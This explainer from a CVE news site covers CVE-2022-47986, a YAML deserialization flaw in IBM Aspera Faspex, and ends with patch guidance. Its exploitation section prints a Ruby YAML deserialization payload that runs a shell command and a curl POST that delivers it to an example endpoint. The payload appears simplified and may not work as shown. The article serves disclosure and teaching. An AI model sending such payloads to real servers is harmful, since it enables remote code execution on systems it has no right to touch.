CVE CyberSecurity Database News

CVE-2022-47986 - How a YAML Flaw Let Attackers Run Code on IBM Aspera Faspex

Poster -

IBM Aspera Faspex is a high-speed file exchange application used by organizations around the world. In early 2023, security researchers identified a critical vulnerability (CVE-2022-47986) in Faspex versions up to 4.4.2 Patch Level 1. This flaw allowed an attacker to run any code they wanted on the server by abusing a dangerous bug in how the application handled YAML files.

Let’s break down how this happened, walk through an example attack, and learn what you should do.

What’s the Vulnerability?

Faspex had an old, seldom-used API endpoint (“obsolete API call”) that parsed YAML input from requests. This endpoint didn't properly validate or sanitize the YAML, so malicious code embedded inside a YAML document would get executed. That’s called a "YAML deserialization vulnerability".

Why YAML is Dangerous

YAML is a data serialization language. When the server receives YAML data and blindly "deserializes" it, it can be tricked into executing commands.

Most Ruby and Python YAML parsers will let you specify objects, not just plain data. If this data comes from an attacker, it’s easy to sneak in system commands.

Exploiting CVE-2022-47986 (With Code Example)

Step 1: The attacker finds Faspex server running vulnerable software.

Step 2: The server exposes the old API, for example at /faspex/api/obsolete.

Step 3: The attacker sends a POST request to this endpoint with a custom YAML payload that tells the server to create a system-level operation.

Example Malicious YAML

The following is a theoretical example for educational purposes. It uses Ruby’s YAML features to call system commands:

--- !ruby/object:Gem::Installer
i: x
gem_home: "|echo pwned > /tmp/hacked.txt"

This tells Ruby’s YAML loader: "Hey, create a Gem::Installer object, and as part of its deserialization, run echo pwned > /tmp/hacked.txt."

Here’s a simple way to send the payload with curl

curl -X POST \
  -H "Content-Type: application/x-yaml" \
  --data-binary @payload.yaml \
  "https://target_faspex_server/faspex/api/obsolete";

What Happens?

If the server is vulnerable, it will parse the YAML, run the echo pwned > /tmp/hacked.txt command, and the attacker now knows they have code execution.

From there, they can do almost anything: make a reverse shell, exfiltrate data, alter files, or install backdoors.

The Fix

IBM removed the dangerous API endpoint in Aspera Faspex 4.4.2 Patch Level 2.

- Upgrade now: IBM Security Bulletin
- Patch notes in the release changelog

References & More Reading

- IBM Security Bulletin: CVE-2022-47986
- NVD Entry
- IBM X-Force ID: 243512
- YAML Deserialization Vulnerabilities
- How to write secure YAML code (OWASP)

Final Words

CVE-2022-47986 is a textbook example of how a little-used, forgotten API endpoint can punch a hole through your defenses. If you run anything older than Faspex 4.4.2 PL2, upgrade now. And for developers: treat input like it’s radioactive—and never deserialize anything a stranger hands you!

Timeline

Published on: 02/17/2023 16:15:00 UTC
Last modified on: 02/28/2023 14:37:00 UTC